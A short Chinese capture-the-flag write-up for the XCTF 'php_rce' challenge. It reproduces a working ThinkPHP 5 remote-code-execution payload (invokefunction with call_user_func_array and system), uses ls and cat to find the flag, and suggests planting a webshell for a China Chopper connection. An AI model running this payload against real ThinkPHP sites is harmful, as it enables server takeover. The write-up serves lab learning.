xctf高级篇-3（rce远程命令/代码执行漏洞）

lcq

1.观察题目 php_rce 可知，考察php的远程代码执行漏洞



2.进入页面

观察到，版本为TP 的V5版本，百度该版本的rce漏洞，得到一个payload
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= *****(此处输入命令)

3.我们先尝试输入ls



打开各个php后未发现和flag相关内容
4.再依次打开../     ../../  ../../../   先观察有没有文件名和flag相关的，如果没有再去找具体的文件内部





最终 在../../../即上上上层目录中发现了一个flag文件（夹）


5.我们再尝试用cat ../../../flag命令查看内容

得到flag
flag{thinkphp5_rce}

ThinkPHP5.x rec 漏洞分析与复现博客
https://blog.csdn.net/qq_40884727/article/details/101452478

END


总结 这道题的提示还是很明显的，通过搜索引擎可以得到payload可以直接利用

lcq

另外 应该还可以通过该漏洞写入一个小马，用菜刀连接试试，这只是一个思路，暂未尝试